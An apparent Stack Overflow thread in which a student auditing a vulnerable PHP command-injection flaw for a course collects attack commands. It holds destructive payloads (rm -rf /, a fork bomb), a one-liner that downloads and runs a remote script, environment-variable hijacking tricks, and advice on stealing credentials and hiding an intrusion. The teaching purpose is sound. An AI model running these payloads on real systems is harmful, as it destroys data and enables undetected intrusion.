# What malicious bash commands/scripts can be executed?

Tags: bash, unix, code-injection

For my network security course, we're supposed to audit a vulnerable website and list all of the possible things we could do to it. It's a pretty obvious hole in the php code.

```
$tool = $_POST['tool'];
$filename = $_POST['filename'];
$tooldir = './products/' . $tool;
$fullpath = './products/' . $tool .'/' . $filename;
$cmd = 'cat ' . $fullpath; 
system("$cmd");
```

I've got two of them right now that are obvious to me for the `$filename` variable.

```
; rm -rf /
; :(){:|:&};:
```

But I feel like there's a lot more fun things I could include in the write-up other than a kill all and forkbomb. Show me your worst Stack Overflow!

Comment: Umm, it's not enough to just say that _any_ command could be run on the system (that the Apache user has permission to run)?

Comment: It's plenty I'm sure, I'm just looking to enhance my bash-fu.

Comment: Ok. But then this isn't a PHP question at all. Just a generic "what are the most evil commands to run on a linux server" question. Yeah? In which case [google](https://www.google.com/search?q=evil+linux+commands) has plenty of answers for you already.

Comment: Yes. Removed the php tag, apologies.

Comment: "What malicious bash commands/scripts can be executed?" -- All of them.  They can all be executed.

Answer (score 4, accepted):

```
wget https://raw.github.com/keroserene/rickrollrc/master/roll.sh &&
  chmod +x roll.sh &&
  ./roll.sh
```

Comment: Lacks an explanation.

Comment: Needs no explanation.

Answer (score 4):

You're looking only at destructive potential which is not that interesting because the victim can just restore from backup. A much better thing to do would be to use the exploit to see what you could read and use that to break into the system undetected. A simple listing of files you can read and modify is much more powerful and useful than simply destroying everything

For example, if you found things like files that accept passwords or javascript called by pages with the wrong permissions, you could modify them to give you this info or send them to a phishing site. Embedded passwords you find could be used to figure out how to do other much more and ideally get into system files so you could cover your tracks. Or if you could replace system utilities, you're truly golden because you have the keys to the kingdom.

Think about it like this. In the physical world, viruses that make the victim sick get identified (and eliminated) quickly. When you compromise a system, you want people to continue going there so they don't even know they have a problem.

Answer (score 1):

define malicious functions for e (echo), i (mkdir), ou (touch), ...

```
IFS='/bcdfghjklmnpqrstvwxz' function_that_will_execute_shell_with_your_environment_as_root

ls='() { echo Pwned; }' bash -c ls
```

You can find many other tricks [here](http://cs.fit.edu/~mmahoney/ids.html).

Comment: Won't this only affect the current shell (the one running the exploit)?

Comment: Only if you use `export`.